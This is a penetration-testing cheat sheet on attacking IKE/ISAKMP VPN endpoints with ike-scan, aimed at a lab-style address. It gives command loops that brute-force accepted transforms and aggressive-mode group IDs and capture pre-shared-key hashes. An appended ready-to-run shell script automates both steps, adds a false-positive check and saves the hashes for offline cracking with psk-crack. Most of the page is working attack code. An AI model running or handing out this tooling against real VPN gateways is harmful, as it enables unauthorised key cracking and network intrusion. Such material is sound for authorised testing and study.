【ISAKMP】ike-scan

1. Exploitation

Find an accepted transform

ike-scan -M 10.10.11.87
  • Look at the Auth attribute in the SA that comes back: Auth=PSK means the VPN is configured with a pre-shared key, which is what the aggressive-mode steps below rely on.

Brute-force the accepted transforms (ike-dict.txt holds one --trans=ENC,HASH,AUTH,GROUP candidate per line; the responder only answers with a handshake when it accepts the offered transform)

while read line; do (echo "Valid trans found: $line" && sudo ike-scan -M "$line" <IP>) | grep -B14 "1 returned handshake" | grep "Valid trans found" ; done < ike-dict.txt

Find the correct ID (group name) and try to obtain the PSK hash. Start with a bogus ID: -A requests aggressive mode, -n sets the ID, and -P prints the PSK hash parameters in psk-crack format. If the responder returns a handshake even for an ID that cannot exist, a handshake alone does not distinguish valid from invalid IDs, so the brute force below needs a different signal.

ike-scan -P -M -A -n fakeID 10.10.11.87

Brute-force common group names with ike-scan

while read line; do (echo "Found ID: $line" && sudo ike-scan -M -A -n "$line" <IP>) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt
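The two loops above (transform brute force and group-ID brute force) combined into one script, as an added example that is not part of the original page: the transform dictionary is generated in place instead of read from ike-dict.txt, the handshake check is pulled into a function that can be exercised on constructed ike-scan summary lines, and a bogus ID is sent before the wordlist so a responder that handshakes with any ID is recognised instead of producing a wall of false "Found ID" hits. TARGET, IDLIST, the attribute value lists and the output file names are assumptions, not from the page.

```shell
#!/bin/sh
# Added example (not from the original page): drives both enumeration steps,
# transform discovery and aggressive-mode ID discovery, against one ike-scan target.
# Assumptions: TARGET and IDLIST default to the values used on the page; ike-scan
# binds UDP/500, so the real scans need root (run with sudo).
TARGET="${TARGET:-10.10.11.87}"
IDLIST="${IDLIST:-/usr/share/wordlists/external/SecLists/Miscellaneous/ike-groupid.txt}"

# IKEv1 phase-1 attribute values (IANA / RFC 2409); AES carries its key length as 7/<bits>.
ENCS="1 5 7/128 7/192 7/256 8"   # DES, 3DES, AES-128/192/256, Camellia
HASHES="1 2 4"                    # MD5, SHA1, SHA2-256
AUTHS="1 3 64221 65001"           # PSK, RSA sig, hybrid RSA (XAUTH), XAUTH-init PSK
DHGROUPS="1 2 5 14"               # MODP 768, 1024, 1536, 2048

# Emit one --trans=ENC,HASH,AUTH,GROUP line per combination: the ike-dict.txt format.
gen_transforms() {
  for e in $ENCS; do for h in $HASHES; do for a in $AUTHS; do for g in $DHGROUPS; do
    echo "--trans=$e,$h,$a,$g"
  done; done; done; done
}

# Succeed when ike-scan output on stdin reports a non-zero "returned handshake" count.
handshake_returned() {
  grep -q '[1-9][0-9]* returned handshake'
}

# Constructed ike-scan summary lines (not real captures) so the check can be run offline.
SAMPLE_HIT='Ending ike-scan 1.9.5: 1 hosts scanned in 0.085 seconds (11.76 hosts/sec).  1 returned handshake; 0 returned notify'
SAMPLE_MISS='Ending ike-scan 1.9.5: 1 hosts scanned in 2.412 seconds (0.41 hosts/sec).  0 returned handshake; 0 returned notify'

# Step 1: offer each transform on its own and report the ones the responder accepts.
find_transforms() {
  gen_transforms | while read -r trans; do
    if ike-scan -M "$trans" "$TARGET" 2>/dev/null | handshake_returned; then
      echo "Valid trans found: $trans"
    fi
  done
}

# Step 2: aggressive-mode ID enumeration. A bogus ID goes first: if that also gets a
# handshake, the responder does not reveal valid IDs this way, so stop instead of
# reporting every wordlist entry as a hit.
find_ids() {
  if ike-scan -M -A -n "no-such-group-$$" "$TARGET" 2>/dev/null | handshake_returned; then
    echo "responder handshakes with a bogus ID; cannot confirm IDs by handshake" >&2
    return 1
  fi
  while read -r id; do
    [ -n "$id" ] || continue
    out=$(ike-scan -P -M -A -n "$id" "$TARGET" 2>/dev/null)   # -P prints PSK hash parameters
    if printf '%s\n' "$out" | handshake_returned; then
      echo "Found ID: $id"
      safe=$(printf '%s' "$id" | tr -c 'A-Za-z0-9._-' '_')    # keep file names sane
      printf '%s\n' "$out" > "ike-$safe.txt"                   # psk-crack input for offline cracking
    fi
  done < "$IDLIST"
}

case "${1:-}" in
  transforms) find_transforms ;;
  ids) find_ids ;;
esac
```

Run as `sudo sh ike-enum.sh transforms` first, then `sudo sh ike-enum.sh ids`; each saved ike-<id>.txt can be fed to psk-crack (the tool shipped with ike-scan) with a wordlist. The baseline probe with a bogus ID is the important addition: without it the page's "Found ID" loop prints every wordlist entry on responders that answer any aggressive-mode request.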